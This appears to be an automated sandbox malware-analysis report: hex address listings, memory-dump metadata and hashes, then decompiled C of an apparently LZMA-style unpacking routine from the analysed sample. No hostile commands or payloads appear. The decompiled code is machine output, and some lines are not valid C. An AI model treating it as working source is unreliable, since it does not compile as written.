                                                                                                        0x00000000
                                                                                                        0x004063d0
                                                                                                        0x004063d4
                                                                                                        0x004063f2
                                                                                                        0x004063f5
                                                                                                        0x004063fc
                                                                                                        0x004063ff
                                                                                                        0x00406402
                                                                                                        0x00406405
                                                                                                        0x00406408
                                                                                                        0x0040640b
                                                                                                        0x0040640d
                                                                                                        0x00406414
                                                                                                        0x00406415
                                                                                                        0x00406417
                                                                                                        0x0040641a
                                                                                                        0x0040641d
                                                                                                        0x00406420
                                                                                                        0x00406420
                                                                                                        0x00406425
                                                                                                        0x00000000
                                                                                                        0x00406425
                                                                                                        0x004063d6
                                                                                                        0x004063d9
                                                                                                        0x004063dc
                                                                                                        0x004063e6
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x00000000
                                                                                                        0x0040679d
                                                                                                        0x00000000
                                                                                                        0x0040643a
                                                                                                        0x0040643e
                                                                                                        0x00406461
                                                                                                        0x00406464
                                                                                                        0x00406467
                                                                                                        0x00406471
                                                                                                        0x00406440
                                                                                                        0x00406440
                                                                                                        0x00406443
                                                                                                        0x00406446
                                                                                                        0x00406449
                                                                                                        0x00406456
                                                                                                        0x00406459
                                                                                                        0x00406459
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x00000000
                                                                                                        0x0040679d
                                                                                                        0x00000000
                                                                                                        0x0040647d
                                                                                                        0x00406481
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406487
                                                                                                        0x0040648b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406491
                                                                                                        0x00406493
                                                                                                        0x00406497
                                                                                                        0x00406497
                                                                                                        0x0040649a
                                                                                                        0x0040649e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406515
                                                                                                        0x00406519
                                                                                                        0x00406520
                                                                                                        0x00406523
                                                                                                        0x00406526
                                                                                                        0x0040651b
                                                                                                        0x0040651b
                                                                                                        0x0040651b
                                                                                                        0x00406529
                                                                                                        0x0040652c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004065d5
                                                                                                        0x004065d5
                                                                                                        0x004065d9
                                                                                                        0x00406977
                                                                                                        0x00000000
                                                                                                        0x00406977
                                                                                                        0x004065df
                                                                                                        0x004065e2
                                                                                                        0x004065e5
                                                                                                        0x004065e9
                                                                                                        0x004065ec
                                                                                                        0x004065f2
                                                                                                        0x004065f4
                                                                                                        0x004065f4
                                                                                                        0x004065f4
                                                                                                        0x004065f7
                                                                                                        0x004065fa
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004061ca
                                                                                                        0x004061ca
                                                                                                        0x004061ce
                                                                                                        0x0040693b
                                                                                                        0x00000000
                                                                                                        0x0040693b
                                                                                                        0x004061d4
                                                                                                        0x004061d7
                                                                                                        0x004061da
                                                                                                        0x004061de
                                                                                                        0x004061e1
                                                                                                        0x004061e7
                                                                                                        0x004061e9
                                                                                                        0x004061e9
                                                                                                        0x004061e9
                                                                                                        0x004061ec
                                                                                                        0x004061ef
                                                                                                        0x004061ef
                                                                                                        0x004061f2
                                                                                                        0x004061f5
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004061fb
                                                                                                        0x00406201
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406207
                                                                                                        0x00406207
                                                                                                        0x0040620b
                                                                                                        0x0040620e
                                                                                                        0x00406211
                                                                                                        0x00406214
                                                                                                        0x00406217
                                                                                                        0x00406218
                                                                                                        0x0040621b
                                                                                                        0x0040621d
                                                                                                        0x00406223
                                                                                                        0x00406226
                                                                                                        0x00406229
                                                                                                        0x0040622c
                                                                                                        0x0040622f
                                                                                                        0x00406232
                                                                                                        0x00406235
                                                                                                        0x00406251
                                                                                                        0x00406254
                                                                                                        0x00406257
                                                                                                        0x0040625a
                                                                                                        0x00406261
                                                                                                        0x00406265
                                                                                                        0x00406267
                                                                                                        0x0040626b
                                                                                                        0x00406237
                                                                                                        0x00406237
                                                                                                        0x0040623b
                                                                                                        0x00406243
                                                                                                        0x00406248
                                                                                                        0x0040624a
                                                                                                        0x0040624c
                                                                                                        0x0040624c
                                                                                                        0x0040626e
                                                                                                        0x00406275
                                                                                                        0x00406278
                                                                                                        0x00000000
                                                                                                        0x0040627e
                                                                                                        0x00000000
                                                                                                        0x0040627e
                                                                                                        0x00000000
                                                                                                        0x00406283
                                                                                                        0x00406283
                                                                                                        0x00406287
                                                                                                        0x00406947
                                                                                                        0x00000000
                                                                                                        0x00406947
                                                                                                        0x0040628d
                                                                                                        0x00406290
                                                                                                        0x00406293
                                                                                                        0x00406297
                                                                                                        0x0040629a
                                                                                                        0x004062a0
                                                                                                        0x004062a2
                                                                                                        0x004062a2
                                                                                                        0x004062a2
                                                                                                        0x004062a5
                                                                                                        0x004062a8
                                                                                                        0x004062a8
                                                                                                        0x004062a8
                                                                                                        0x004062ae
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004062b0
                                                                                                        0x004062b3
                                                                                                        0x004062b6
                                                                                                        0x004062b9
                                                                                                        0x004062bc
                                                                                                        0x004062bf
                                                                                                        0x004062c2
                                                                                                        0x004062c5
                                                                                                        0x004062c8
                                                                                                        0x004062cb
                                                                                                        0x004062ce
                                                                                                        0x004062e6
                                                                                                        0x004062e9
                                                                                                        0x004062ec
                                                                                                        0x004062ef
                                                                                                        0x004062ef
                                                                                                        0x004062f2
                                                                                                        0x004062f6
                                                                                                        0x004062f8
                                                                                                        0x004062d0
                                                                                                        0x004062d0
                                                                                                        0x004062d8
                                                                                                        0x004062dd
                                                                                                        0x004062df
                                                                                                        0x004062e1
                                                                                                        0x004062e1
                                                                                                        0x004062fb
                                                                                                        0x00406302
                                                                                                        0x00406305
                                                                                                        0x00000000
                                                                                                        0x00406307
                                                                                                        0x00000000
                                                                                                        0x00406307
                                                                                                        0x00406305
                                                                                                        0x0040630c
                                                                                                        0x0040630c
                                                                                                        0x0040630c
                                                                                                        0x0040630c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406347
                                                                                                        0x00406347
                                                                                                        0x0040634b
                                                                                                        0x00406953
                                                                                                        0x00000000
                                                                                                        0x00406953
                                                                                                        0x00406351
                                                                                                        0x00406354
                                                                                                        0x00406357
                                                                                                        0x0040635b
                                                                                                        0x0040635e
                                                                                                        0x00406364
                                                                                                        0x00406366
                                                                                                        0x00406366
                                                                                                        0x00406366
                                                                                                        0x00406369
                                                                                                        0x0040636c
                                                                                                        0x0040636c
                                                                                                        0x00406372
                                                                                                        0x00406310
                                                                                                        0x00406310
                                                                                                        0x00406313
                                                                                                        0x00000000
                                                                                                        0x00406313
                                                                                                        0x00406374
                                                                                                        0x00406374
                                                                                                        0x00406377
                                                                                                        0x0040637a
                                                                                                        0x0040637d
                                                                                                        0x00406380
                                                                                                        0x00406383
                                                                                                        0x00406386
                                                                                                        0x00406389
                                                                                                        0x0040638c
                                                                                                        0x0040638f
                                                                                                        0x00406392
                                                                                                        0x004063aa
                                                                                                        0x004063ad
                                                                                                        0x004063b0
                                                                                                        0x004063b3
                                                                                                        0x004063b3
                                                                                                        0x004063b6
                                                                                                        0x004063ba
                                                                                                        0x004063bc
                                                                                                        0x00406394
                                                                                                        0x00406394
                                                                                                        0x0040639c
                                                                                                        0x004063a1
                                                                                                        0x004063a3
                                                                                                        0x004063a5
                                                                                                        0x004063a5
                                                                                                        0x004063bf
                                                                                                        0x004063c6
                                                                                                        0x004063c9
                                                                                                        0x00000000
                                                                                                        0x004063cb
                                                                                                        0x00000000
                                                                                                        0x004063cb
                                                                                                        0x00000000
                                                                                                        0x00406658
                                                                                                        0x00406658
                                                                                                        0x0040665c
                                                                                                        0x00406983
                                                                                                        0x00000000
                                                                                                        0x00406983
                                                                                                        0x00406662
                                                                                                        0x00406665
                                                                                                        0x00406668
                                                                                                        0x0040666c
                                                                                                        0x0040666f
                                                                                                        0x00406675
                                                                                                        0x00406677
                                                                                                        0x00406677
                                                                                                        0x00406677
                                                                                                        0x0040667a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406767
                                                                                                        0x0040676b
                                                                                                        0x0040678d
                                                                                                        0x00406790
                                                                                                        0x0040679a
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x00000000
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x0040676d
                                                                                                        0x00406770
                                                                                                        0x00406774
                                                                                                        0x00406777
                                                                                                        0x00406777
                                                                                                        0x0040677a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406824
                                                                                                        0x00406828
                                                                                                        0x00406846
                                                                                                        0x00406846
                                                                                                        0x00406846
                                                                                                        0x0040684d
                                                                                                        0x00406854
                                                                                                        0x0040685b
                                                                                                        0x0040685b
                                                                                                        0x00000000
                                                                                                        0x0040685b
                                                                                                        0x0040682a
                                                                                                        0x0040682d
                                                                                                        0x00406830
                                                                                                        0x00406833
                                                                                                        0x0040683a
                                                                                                        0x0040677e
                                                                                                        0x0040677e
                                                                                                        0x00406781
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406915
                                                                                                        0x00406918
                                                                                                        0x00406819
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040654f
                                                                                                        0x00406551
                                                                                                        0x00406558
                                                                                                        0x00406559
                                                                                                        0x0040655b
                                                                                                        0x0040655e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406566
                                                                                                        0x00406569
                                                                                                        0x0040656c
                                                                                                        0x0040656e
                                                                                                        0x00406570
                                                                                                        0x00406570
                                                                                                        0x00406571
                                                                                                        0x00406574
                                                                                                        0x0040657b
                                                                                                        0x0040657e
                                                                                                        0x0040658c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406862
                                                                                                        0x00406862
                                                                                                        0x00406865
                                                                                                        0x0040686c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406871
                                                                                                        0x00406871
                                                                                                        0x00406875
                                                                                                        0x004069ad
                                                                                                        0x00000000
                                                                                                        0x004069ad
                                                                                                        0x0040687b
                                                                                                        0x0040687e
                                                                                                        0x00406881
                                                                                                        0x00406885
                                                                                                        0x00406888
                                                                                                        0x0040688e
                                                                                                        0x00406890
                                                                                                        0x00406890
                                                                                                        0x00406890
                                                                                                        0x00406893
                                                                                                        0x00406896
                                                                                                        0x00406896
                                                                                                        0x00406896
                                                                                                        0x00406896
                                                                                                        0x00406899
                                                                                                        0x00406899
                                                                                                        0x0040689d
                                                                                                        0x004068fd
                                                                                                        0x00406900
                                                                                                        0x00406905
                                                                                                        0x00406906
                                                                                                        0x00406908
                                                                                                        0x0040690a
                                                                                                        0x0040690d
                                                                                                        0x00406819
                                                                                                        0x00406819
                                                                                                        0x00000000
                                                                                                        0x0040681f
                                                                                                        0x00406819
                                                                                                        0x0040689f
                                                                                                        0x004068a5
                                                                                                        0x004068a8
                                                                                                        0x004068ab
                                                                                                        0x004068ae
                                                                                                        0x004068b1
                                                                                                        0x004068b4
                                                                                                        0x004068b7
                                                                                                        0x004068ba
                                                                                                        0x004068bd
                                                                                                        0x004068c0
                                                                                                        0x004068d9
                                                                                                        0x004068dc
                                                                                                        0x004068df
                                                                                                        0x004068e2
                                                                                                        0x004068e6
                                                                                                        0x004068e8
                                                                                                        0x004068e8
                                                                                                        0x004068e9
                                                                                                        0x004068ec
                                                                                                        0x004068c2
                                                                                                        0x004068c2
                                                                                                        0x004068ca
                                                                                                        0x004068cf
                                                                                                        0x004068d1
                                                                                                        0x004068d4
                                                                                                        0x004068d4
                                                                                                        0x004068ef
                                                                                                        0x004068f6
                                                                                                        0x00000000
                                                                                                        0x004068f8
                                                                                                        0x00000000
                                                                                                        0x004068f8
                                                                                                        0x00000000
                                                                                                        0x00406594
                                                                                                        0x00406597
                                                                                                        0x004065cd
                                                                                                        0x004066fd
                                                                                                        0x004066fd
                                                                                                        0x004066fd
                                                                                                        0x004066fd
                                                                                                        0x00406700
                                                                                                        0x00406700
                                                                                                        0x00406703
                                                                                                        0x00406705
                                                                                                        0x0040698f
                                                                                                        0x00000000
                                                                                                        0x0040698f
                                                                                                        0x0040670b
                                                                                                        0x0040670e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406714
                                                                                                        0x00406718
                                                                                                        0x0040671b
                                                                                                        0x0040671b
                                                                                                        0x0040671b
                                                                                                        0x00000000
                                                                                                        0x0040671b
                                                                                                        0x00406599
                                                                                                        0x0040659b
                                                                                                        0x0040659d
                                                                                                        0x0040659f
                                                                                                        0x004065a2
                                                                                                        0x004065a3
                                                                                                        0x004065a5
                                                                                                        0x004065a7
                                                                                                        0x004065aa
                                                                                                        0x004065ad
                                                                                                        0x004065c3
                                                                                                        0x004065c8
                                                                                                        0x00406600
                                                                                                        0x00406600
                                                                                                        0x00406604
                                                                                                        0x00406630
                                                                                                        0x00406632
                                                                                                        0x00406639
                                                                                                        0x0040663c
                                                                                                        0x0040663f
                                                                                                        0x0040663f
                                                                                                        0x00406644
                                                                                                        0x00406644
                                                                                                        0x00406646
                                                                                                        0x00406649
                                                                                                        0x00406650
                                                                                                        0x00406653
                                                                                                        0x00406680
                                                                                                        0x00406680
                                                                                                        0x00406683
                                                                                                        0x00406686
                                                                                                        0x004066fa
                                                                                                        0x004066fa
                                                                                                        0x004066fa
                                                                                                        0x00000000
                                                                                                        0x004066fa
                                                                                                        0x00406688
                                                                                                        0x0040668e
                                                                                                        0x00406691
                                                                                                        0x00406694
                                                                                                        0x00406697
                                                                                                        0x0040669a
                                                                                                        0x0040669d
                                                                                                        0x004066a0
                                                                                                        0x004066a3
                                                                                                        0x004066a6
                                                                                                        0x004066a9
                                                                                                        0x004066c2
                                                                                                        0x004066c4
                                                                                                        0x004066c7
                                                                                                        0x004066c8
                                                                                                        0x004066cb
                                                                                                        0x004066cd
                                                                                                        0x004066d0
                                                                                                        0x004066d2
                                                                                                        0x004066d4
                                                                                                        0x004066d7
                                                                                                        0x004066d9
                                                                                                        0x004066dc
                                                                                                        0x004066e0
                                                                                                        0x004066e2
                                                                                                        0x004066e2
                                                                                                        0x004066e3
                                                                                                        0x004066e6
                                                                                                        0x004066e9
                                                                                                        0x004066ab
                                                                                                        0x004066ab
                                                                                                        0x004066b3
                                                                                                        0x004066b8
                                                                                                        0x004066ba
                                                                                                        0x004066bd
                                                                                                        0x004066bd
                                                                                                        0x004066ec
                                                                                                        0x004066f3
                                                                                                        0x0040667d
                                                                                                        0x0040667d
                                                                                                        0x0040667d
                                                                                                        0x0040667d
                                                                                                        0x00000000
                                                                                                        0x004066f5
                                                                                                        0x00000000
                                                                                                        0x004066f5
                                                                                                        0x004066f3
                                                                                                        0x00406606
                                                                                                        0x00406609
                                                                                                        0x0040660b
                                                                                                        0x0040660e
                                                                                                        0x00406611
                                                                                                        0x00406614
                                                                                                        0x00406616
                                                                                                        0x00406619
                                                                                                        0x0040661c
                                                                                                        0x0040661c
                                                                                                        0x0040661f
                                                                                                        0x0040661f
                                                                                                        0x00406622
                                                                                                        0x00406629
                                                                                                        0x004065fd
                                                                                                        0x004065fd
                                                                                                        0x004065fd
                                                                                                        0x004065fd
                                                                                                        0x00000000
                                                                                                        0x0040662b
                                                                                                        0x00000000
                                                                                                        0x0040662b
                                                                                                        0x00406629
                                                                                                        0x004065af
                                                                                                        0x004065b2
                                                                                                        0x004065b4
                                                                                                        0x004065b7
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406316
                                                                                                        0x00406316
                                                                                                        0x0040631a
                                                                                                        0x0040695f
                                                                                                        0x00000000
                                                                                                        0x0040695f
                                                                                                        0x00406320
                                                                                                        0x00406323
                                                                                                        0x00406326
                                                                                                        0x00406329
                                                                                                        0x0040632c
                                                                                                        0x0040632f
                                                                                                        0x00406332
                                                                                                        0x00406334
                                                                                                        0x00406337
                                                                                                        0x0040633a
                                                                                                        0x0040633d
                                                                                                        0x0040633f
                                                                                                        0x0040633f
                                                                                                        0x0040633f
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004064a1
                                                                                                        0x004064a1
                                                                                                        0x004064a5
                                                                                                        0x0040696b
                                                                                                        0x00000000
                                                                                                        0x0040696b
                                                                                                        0x004064ab
                                                                                                        0x004064ae
                                                                                                        0x004064b1
                                                                                                        0x004064b4
                                                                                                        0x004064b6
                                                                                                        0x004064b6
                                                                                                        0x004064b6
                                                                                                        0x004064b9
                                                                                                        0x004064bc
                                                                                                        0x004064bf
                                                                                                        0x004064c2
                                                                                                        0x004064c5
                                                                                                        0x004064c8
                                                                                                        0x004064c9
                                                                                                        0x004064cb
                                                                                                        0x004064cb
                                                                                                        0x004064cb
                                                                                                        0x004064ce
                                                                                                        0x004064d1
                                                                                                        0x004064d4
                                                                                                        0x004064d7
                                                                                                        0x004064d7
                                                                                                        0x004064d7
                                                                                                        0x004064da
                                                                                                        0x004064dc
                                                                                                        0x004064dc
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040671e
                                                                                                        0x0040671e
                                                                                                        0x0040671e
                                                                                                        0x00406722
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406728
                                                                                                        0x0040672b
                                                                                                        0x0040672e
                                                                                                        0x00406731
                                                                                                        0x00406733
                                                                                                        0x00406733
                                                                                                        0x00406733
                                                                                                        0x00406736
                                                                                                        0x00406739
                                                                                                        0x0040673c
                                                                                                        0x0040673f
                                                                                                        0x00406742
                                                                                                        0x00406745
                                                                                                        0x00406746
                                                                                                        0x00406748
                                                                                                        0x00406748
                                                                                                        0x00406748
                                                                                                        0x0040674b
                                                                                                        0x0040674e
                                                                                                        0x00406751
                                                                                                        0x00406754
                                                                                                        0x00406757
                                                                                                        0x0040675b
                                                                                                        0x0040675d
                                                                                                        0x00406760
                                                                                                        0x00000000
                                                                                                        0x00406762
                                                                                                        0x004064df
                                                                                                        0x004064df
                                                                                                        0x00000000
                                                                                                        0x004064df
                                                                                                        0x00406760
                                                                                                        0x00406995
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405fc4
                                                                                                        0x004069cc
                                                                                                        0x004069cc
                                                                                                        0x00000000
                                                                                                        0x004069cc
                                                                                                        0x00406819
                                                                                                        0x004067a0
                                                                                                        0x0040679d
                                                                                                        0x00000000
                                                                                                        0x004064f2

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.248371390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.248309082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248454686.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248475824.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248501267.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248529571.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 55b1e8378e3b2d282ecc9e99db2cbf184c75cfe722202a43e2005f386b139382
                                                                                                        • Instruction ID: 067b91939e33353516387f96afd3df60e22fb0a2a23546be1218d687de4ca84d
                                                                                                        • Opcode Fuzzy Hash: 55b1e8378e3b2d282ecc9e99db2cbf184c75cfe722202a43e2005f386b139382
                                                                                                        • Instruction Fuzzy Hash: 14715371E00229CFEF28CF98C844BADBBB1FB44305F15816AD816BB281C7799996DF54
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040643A, Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 98%
                                                                                                        			E0040643A() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004069D4))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
